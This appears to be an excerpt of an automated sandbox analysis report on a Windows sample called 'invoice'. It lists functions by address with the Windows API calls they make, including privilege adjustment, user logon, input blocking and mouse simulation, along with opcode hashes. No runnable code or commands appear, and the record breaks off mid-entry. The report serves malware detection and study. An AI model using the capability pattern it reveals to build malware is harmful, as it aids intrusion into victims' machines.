                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ErrorMode$DiskFreeSpace
                        • String ID:
                        • API String ID: 1682464887-0
                        • Opcode ID: 17686f5b8a218f8e0de111ba29afe6e75f1be017b0d0b12cba09b36979e92867
                        • Instruction ID: 5fb80a7844e87c69f85fc18370d2c422698f8135c209aa4bdb6ad1aecf981d3f
                        • Opcode Fuzzy Hash: 17686f5b8a218f8e0de111ba29afe6e75f1be017b0d0b12cba09b36979e92867
                        • Instruction Fuzzy Hash: 15216D35A00118EFCB00EFA5D884AEEBBF8FF49310F1480A9E845AB355CB359915DB51
                        Function 00FD8AA3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FA0F36: std::exception::exception.LIBCMT ref: 00FA0F6C
                          • Part of subcall function 00FA0F36: __CxxThrowException@8.LIBCMT ref: 00FA0F81
                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FD8AED
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FD8B1A
                        • GetLastError.KERNEL32 ref: 00FD8B27
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                        • String ID:
                        • API String ID: 1922334811-0
                        • Opcode ID: 9adf5c61ade28560d46c4b2877759ea4bbc431e425f1e61b420f761045b693fb
                        • Instruction ID: cd77b192e68827913030bb37066a701f49fb9e9db7c5ab73b591e49efee144ab
                        • Opcode Fuzzy Hash: 9adf5c61ade28560d46c4b2877759ea4bbc431e425f1e61b420f761045b693fb
                        • Instruction Fuzzy Hash: 3211C1B2914205AFD728DF54EC85D2BB7BDFB44320B24816EF49697240EB34BC01DB60
                        Function 00FE4A08 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                        Download Yara Rule
                        APIs
                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FE4A31
                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00FE4A48
                        • FreeSid.ADVAPI32(?), ref: 00FE4A58
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AllocateCheckFreeInitializeMembershipToken
                        • String ID:
                        • API String ID: 3429775523-0
                        • Opcode ID: 1da4f322106c95918c34a558b86b60f29f86fa13a572a211e6e9f89f78be1f26
                        • Instruction ID: 9360c4e934dfeed8aa0bfd84f7d9013eeeb8576b870ae8ea907fcd3f9b65eb66
                        • Opcode Fuzzy Hash: 1da4f322106c95918c34a558b86b60f29f86fa13a572a211e6e9f89f78be1f26
                        • Instruction Fuzzy Hash: 77F04975A5130DBFDF10DFF0D889AAEBBBCEF08611F0044A9B901E2180E6756A049B50
                        Function 00F8E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 79d7d03cddd8e72f2a2171ae3c7b4dfea98dc4e1eefe0abac294232f57c1d9df
                        • Instruction ID: 7fa75093999355140deb762f4d5ea8c5661392715a24800cf797803d8ad6980c
                        • Opcode Fuzzy Hash: 79d7d03cddd8e72f2a2171ae3c7b4dfea98dc4e1eefe0abac294232f57c1d9df
                        • Instruction Fuzzy Hash: 7C22AD75E002169FDB24EF54C885BEEBBB0FF05320F148069E856AB341E774AD85EB91
                        Function 00FEC75D Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 00FEC787
                        • FindClose.KERNEL32(00000000), ref: 00FEC7B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: c87092762dd256dd582a401765d4dad0d5e6979562754a4575ffd578de7a29f6
                        • Instruction ID: fa34daa4e8e613c07b65a711e28173e658116ddb9051c67a1530e71c89a6b084
                        • Opcode Fuzzy Hash: c87092762dd256dd582a401765d4dad0d5e6979562754a4575ffd578de7a29f6
                        • Instruction Fuzzy Hash: 7E11A1326046009FD714EF69D885A6AF7E9FF84320F04851EF9AAD7391DB74AC01EB81
                        Function 00FEA0F4 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00FF957D,?,0100FB84,?), ref: 00FEA121
                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00FF957D,?,0100FB84,?), ref: 00FEA133
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ErrorFormatLastMessage
                        • String ID:
                        • API String ID: 3479602957-0
                        • Opcode ID: 77404648d9f0b90790e93a07e14c9d1d996f996cb24702d625595acdde92001c
                        • Instruction ID: 466cfe0111811449971b2148e246e40954933a05835a4ca05854d3ef4f6ba9aa
                        • Opcode Fuzzy Hash: 77404648d9f0b90790e93a07e14c9d1d996f996cb24702d625595acdde92001c
                        • Instruction Fuzzy Hash: 9FF0823550522DBBDB21AFA5CC48FEA776CFF08361F008155B909D6185DA38A940EFB1
                        Function 00FD84F3 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FD8631), ref: 00FD8508
                        • CloseHandle.KERNEL32(?,?,00FD8631), ref: 00FD851A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AdjustCloseHandlePrivilegesToken
                        • String ID:
                        • API String ID: 81990902-0
                        • Opcode ID: d131dbdf5efd8db59c3ffe6abaec6c7269a535629f08557dc212134c26827744
                        • Instruction ID: c238c868ee6ea4485bd310a5d2555534c40137638f4f3652bece819977fe1866
                        • Opcode Fuzzy Hash: d131dbdf5efd8db59c3ffe6abaec6c7269a535629f08557dc212134c26827744
                        • Instruction Fuzzy Hash: D2E0B6B2014611AFE7362B64FC09E777BA9EB44360B148829B49680474DB66ACA1EB50
                        Function 00FAA2D5 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FA8ED7,?,?,?,00000001), ref: 00FAA2DA
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FAA2E3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 24ac1b1fe2deba4a713710893888f6c4748d3154f028e21336111b0813d9435c
                        • Instruction ID: ba911ee3f23f9caee27f7313bd55e44b60a8e859c6b05a48578a50b6a603392c
                        • Opcode Fuzzy Hash: 24ac1b1fe2deba4a713710893888f6c4748d3154f028e21336111b0813d9435c
                        • Instruction Fuzzy Hash: 87B0923105820AABCA222B91E809B883F68EB45AB2F408010F64D84054CBE75450AB91
                        Function 00FAF359 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9e83661307f15068a5705f6cc669f9401f2e70963b77f0f4d97bb64865c02e17
                        • Instruction ID: e6420eb709e74df7eaf6d29e0c61b1a4ba5a6327ee2c7b2ec368cec0ad507d0e
                        • Opcode Fuzzy Hash: 9e83661307f15068a5705f6cc669f9401f2e70963b77f0f4d97bb64865c02e17
                        • Instruction Fuzzy Hash: 0E323372D29F014DD7239534C872336A259AFB73D4F15D737E81AB9A9AEB2DC4831200
                        Function 00FB25AE Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 75e986ec55450f1a498abf52368ed95ce91be60856fb1174165bc768d38c5b78
                        • Instruction ID: 689147f18574f3718fdafa9454533f1ebbb904efef1d418d2e1a962ac4c08e58
                        • Opcode Fuzzy Hash: 75e986ec55450f1a498abf52368ed95ce91be60856fb1174165bc768d38c5b78
                        • Instruction Fuzzy Hash: D1B10130E2AF808DD32396398831336B64CAFBB2D5F51D71BFC6675D16EB2A85834240
                        Function 00FE8932 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                        Download Yara Rule
                        APIs
                        • __time64.LIBCMT ref: 00FE8944
                          • Part of subcall function 00FA537A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00FE9017,00000000,?,?,?,?,00FE91C8,00000000,?), ref: 00FA5383
                          • Part of subcall function 00FA537A: __aulldiv.LIBCMT ref: 00FA53A3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Time$FileSystem__aulldiv__time64
                        • String ID:
                        • API String ID: 2893107130-0
                        • Opcode ID: 1cb17c33bd94c2b326db27a5e344e1519259ec7fe9dfaecc97473de958dc5e5b
                        • Instruction ID: ad9dc5823598269e3396032a7ff08a52b2233f321bdfcb7d615b8e410eba9044
                        • Opcode Fuzzy Hash: 1cb17c33bd94c2b326db27a5e344e1519259ec7fe9dfaecc97473de958dc5e5b
                        • Instruction Fuzzy Hash: DA21E772A35510CBC729CF25D481B51B3E1EFA5320F288E2CD5E9CB2C0DA35B905DB50
                        Function 00FF401F Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • BlockInput.USER32(00000001), ref: 00FF403A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: BlockInput
                        • String ID:
                        • API String ID: 3456056419-0
                        • Opcode ID: 62c45bb54dc152b8377b986941d4461b9d8b84affebd18d07557ddae4befd79a
                        • Instruction ID: 9e36988f180263b4d87c8535fe04ec0cabe14c55da99961ffed77baa199faad1
                        • Opcode Fuzzy Hash: 62c45bb54dc152b8377b986941d4461b9d8b84affebd18d07557ddae4befd79a
                        • Instruction Fuzzy Hash: 07E048322041155FC724AF59D844EA7FBD8AF64760F048015FD4AD7351DAB5F840DB90
                        Function 00FE4CFA Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00FE4D1D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: mouse_event
                        • String ID:
                        • API String ID: 2434400541-0
                        • Opcode ID: c2c973c1ca89b74aa6d96187875c56d4201d1fd7d799c41069f9bea4ddc01df3
                        • Instruction ID: b8b10d21bb590d47887f303166b40ad585957d4f6de1f0ff27dae4248ea4e396
                        • Opcode Fuzzy Hash: c2c973c1ca89b74aa6d96187875c56d4201d1fd7d799c41069f9bea4ddc01df3
                        • Instruction Fuzzy Hash: B4D09EA556468779FC380B269C2FB76210AF3017A6FA4454E7602962C5A8E97841B835
                        Function 00FD8A73 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                        Download Yara Rule
                        APIs
                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00FD86B1), ref: 00FD8A93
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: LogonUser
                        • String ID:
                        • API String ID: 1244722697-0
                        • Opcode ID: d964a5787d7df9de172d9475a189f8da83195656b52cbc5850138eabfed1e787
                        • Instruction ID: d5db774f1666c6f62323c3dd4bfd4c7f6edbeb51ab8a456ad5ae6c28cd0376f8
                        • Opcode Fuzzy Hash: d964a5787d7df9de172d9475a189f8da83195656b52cbc5850138eabfed1e787
                        • Instruction Fuzzy Hash: 97D05E3226090EABEF11CEA4DC01EAF3B69EB04B01F408111FE15C5090C776D835AF60
                        Function 00FC215F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                        Download Yara Rule
                        APIs
                        • GetUserNameW.ADVAPI32(?,?), ref: 00FC2171
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: NameUser
                        • String ID:
                        • API String ID: 2645101109-0
                        • Opcode ID: eb883db5c9132404f2134f76db4975176c8c7fc340ac8cb8086e3562b44bc098
                        • Instruction ID: 1784eac8b3bcbcf22f910b35b12498d84b4f9e852414e0dd0b7b2681d10d0d8a
                        • Opcode Fuzzy Hash: eb883db5c9132404f2134f76db4975176c8c7fc340ac8cb8086e3562b44bc098
                        • Instruction Fuzzy Hash: BCC04CF180510EDBDB15EB90D688EEE77BCFB04304F104055A141F2100D7789B449B71
                        Function 00FAA2A4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                        Download Yara Rule
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FAA2AA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 29b366e9a2baf8db97771b80f0dfee44381b0d12c8223fb105980d763c575f73
                        • Instruction ID: 4fc1d08d65833745488d82020a48d1e715a3b5c71e5db6a99c1634bf9c5daa6f
                        • Opcode Fuzzy Hash: 29b366e9a2baf8db97771b80f0dfee44381b0d12c8223fb105980d763c575f73
                        • Instruction Fuzzy Hash: 75A0123000410DA78A111B41E8044447F5CD6001A0B008010F40C4001187B354105680
                        Function 00F98968 Relevance: .6, Instructions: 590COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cf08f21a562bf8504b1dd68b9ce173ec1538e7b07f0f95f227130eaf2e5ac07d
                        • Instruction ID: a01ae472b0fb4b5cd05aab154ead42eedcff62bb70bb54af0689f7ef9b36d313
                        • Opcode Fuzzy Hash: cf08f21a562bf8504b1dd68b9ce173ec1538e7b07f0f95f227130eaf2e5ac07d
                        • Instruction Fuzzy Hash: 64222371D001568BEF389E19C49477CB7A2FB867A4F2C802BD8528B6A1DB34DD82F741
                        Function 00FA2345 Relevance: .3, Instructions: 345COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                        • Instruction ID: c3978986eb9a1508248085f0019e13f6d7996ac50a2adfe3670cf3908f5ed4c6
                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                        • Instruction Fuzzy Hash: 15C185B2A151A30DDF6D863D843413EBEA16AA37B271A075DE8B3CB5D5FF10C524E620
                        Function 00FA277A Relevance: .3, Instructions: 341COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                        • Instruction ID: 2329711a8ce256f80bacb32cf343def0d433916ae0d466bc1fa41090b58c5068
                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                        • Instruction Fuzzy Hash: 93C173B2A151A30ADF6D463D843413EBFA16AA37B271A076DE4B2DB5C4FF14C524F620
                        Function 00FA1AF8 Relevance: .3, Instructions: 323COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
